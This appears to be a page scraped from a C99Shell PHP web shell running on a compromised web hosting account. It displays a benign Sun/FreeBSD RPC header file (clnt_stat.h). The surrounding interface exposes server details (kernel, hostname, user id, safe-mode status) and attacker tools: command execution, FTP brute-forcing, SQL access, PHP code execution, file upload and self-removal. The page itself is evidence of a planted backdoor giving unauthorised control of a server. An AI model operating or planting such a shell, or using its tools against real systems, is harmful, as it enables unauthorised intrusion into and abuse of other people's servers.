!C99Shell v. 2.0 [PHP 7 Update] [25.02.2019]!

Software: Apache. PHP/7.3.33 

uname -a: Linux web25.us.cloudlogin.co 5.10.237-xeon-hst #1 SMP Mon May 5 15:10:04 UTC 2025 x86_64 

uid=233359(alpastrology) gid=888(tty) groups=888(tty),33(tape) 

Safe-mode: OFF (not secure)

/usr/include/tirpc/rpc/   drwxr-xr-x
Free 6182.09 GB of 6263.29 GB (98.7%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     clnt_stat.h (2.15 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
/*    $FreeBSD: src/include/rpc/clnt_stat.h,v 1.2 2001/03/20 08:20:50 alfred Exp $ */
/*
 * Copyright (c) 1986 - 1991, 1994, 1996, 1997 by Sun Microsystems, Inc.
 * All rights reserved.
 */

/*
 * clnt_stat.h - Client side remote procedure call enum
 *
 */

#ifndef    _RPC_CLNT_STAT_H
#define    _RPC_CLNT_STAT_H

/* #pragma ident    "@(#)clnt_stat.h    1.2    97/04/28 SMI" */

#ifdef __cplusplus
extern "C" {
#endif

enum clnt_stat {
    RPC_SUCCESS = 0,            /* call succeeded */
    /*
     * local errors
     */
    RPC_CANTENCODEARGS = 1,        /* can't encode arguments */
    RPC_CANTDECODERES = 2,        /* can't decode results */
    RPC_CANTSEND = 3,            /* failure in sending call */
    RPC_CANTRECV = 4,
    /* failure in receiving result */
    RPC_TIMEDOUT = 5,            /* call timed out */
    RPC_INTR = 18,            /* call interrupted */
    RPC_UDERROR = 23,            /* recv got uderr indication */
    /*
     * remote errors
     */
    RPC_VERSMISMATCH = 6,        /* rpc versions not compatible */
    RPC_AUTHERROR = 7,        /* authentication error */
    RPC_PROGUNAVAIL = 8,        /* program not available */
    RPC_PROGVERSMISMATCH = 9,    /* program version mismatched */
    RPC_PROCUNAVAIL = 10,        /* procedure unavailable */
    RPC_CANTDECODEARGS = 11,        /* decode arguments error */
    RPC_SYSTEMERROR = 12,        /* generic "other problem" */

    /*
     * rpc_call & clnt_create errors
     */
    RPC_UNKNOWNHOST = 13,        /* unknown host name */
    RPC_UNKNOWNPROTO = 17,        /* unknown protocol */
    RPC_UNKNOWNADDR = 19,        /* Remote address unknown */
    RPC_NOBROADCAST = 21,        /* Broadcasting not supported */

    /*
     * rpcbind errors
     */
    RPC_RPCBFAILURE = 14,        /* the pmapper failed in its call */
#define    RPC_PMAPFAILURE RPC_RPCBFAILURE
    RPC_PROGNOTREGISTERED = 15,    /* remote program is not registered */
    RPC_N2AXLATEFAILURE = 22,
    /* Name to address translation failed */
    /*
     * Misc error in the TLI library
     */
    RPC_TLIERROR = 20,
    /*
     * unspecified error
     */
    RPC_FAILED = 16,
    /*
     * asynchronous errors
     */
    RPC_INPROGRESS = 24,
    RPC_STALERACHANDLE = 25,
    RPC_CANTCONNECT = 26,        /* couldn't make connection (cots) */
    RPC_XPRTFAILED = 27,        /* received discon from remote (cots) */
    RPC_CANTCREATESTREAM = 28    /* can't push rpc module (cots) */
};

#ifdef __cplusplus
}
#endif

#endif    /* !_RPC_CLNT_STAT_H */

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.0 [PHP 7 Update] [25.02.2019] maintained by KaizenLouie | C99Shell Github | Generation time: 0.0142 ]--